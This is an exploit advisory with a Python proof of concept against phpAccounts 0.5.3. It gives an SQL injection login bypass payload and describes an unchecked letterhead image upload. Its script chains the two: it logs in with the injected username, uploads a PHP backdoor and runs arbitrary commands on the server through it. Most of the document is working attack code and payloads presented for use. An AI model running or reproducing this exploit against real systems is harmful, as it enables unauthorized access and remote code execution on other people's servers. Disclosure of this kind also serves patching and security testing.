######################################################################################
# Exploit phpAcounts v.0.5.3 SQL Injection
# Date: June 6nd 2012
# Author: loneferret
# Version: 0.5.3
# Vendor Url: http://phpaccounts.com/
# Tested on: Ubuntu Server 11.10
######################################################################################
# Discovered by: loneferret
######################################################################################
# Old app, still fun.
Auth. Bypass:
http://<server>/phpaccounts/index.php
Username: x' or '1'='1'#
Password: <whatever>
Upload php shell in preferences
Letterhead image upload does not sanitize file extensions.
http://server/index.php?page=tasks&action=preferences
Acess shell:
Where '1' is the user's ID.
http://server/phpaccounts/users/1/<filename>
---- Python PoC ---------
#!/usr/bin/python
import re, mechanize
import urllib, sys
print "\n[*] phpAcounts v.0.5.3 Remote Code Execution"
print "[*] Vulnerability discovered by loneferret"
print "[*] Offensive Security - http://www.offensive-security.com\n"
if (len(sys.argv) != 3):
print "[*] Usage: poc.py <RHOST> <RCMD>"
exit(0)
rhost = sys.argv[1]
rcmd = sys.argv[2]
print "[*] Bypassing Login ."
try:
br = mechanize.Browser()
br.open("http://%s/phpaccounts/index.php?frameset=true" % rhost)
assert br.viewing_html()
br.select_form(name="loginForm")
br.select_form(nr=0)
br.form['Login_Username'] = "x' or '1'#"
br.form['Login_Password'] = "pwnd"
print "[*] Triggering SQLi .."
br.submit()
except:
print "[*] Oups..Something happened"
exit(0)
print "[*] Uploading Shell ..."
try:
br.open("http://%s/phpaccounts/index.php?page=tasks&action=preferences" % rhost)
assert br.viewing_html()
br.select_form(nr=0)
br.form["Preferences[LETTER_HEADER]"] = 'test'
br.form.add_file(open('backdoor.php'), "text/plain", "backdoor.php", name="letterhead_image")
br.submit(nr=2)
except:
print "[*] Upload didn't work"
exit(0)
print "[*] Command Executed\n"
try:
shell = urllib.urlopen("http://%s/phpaccounts/users/1/backdoor.php?cmd=%s" % (rhost,rcmd))
print shell.read()
except:
print "[*] Oups."
exit(0)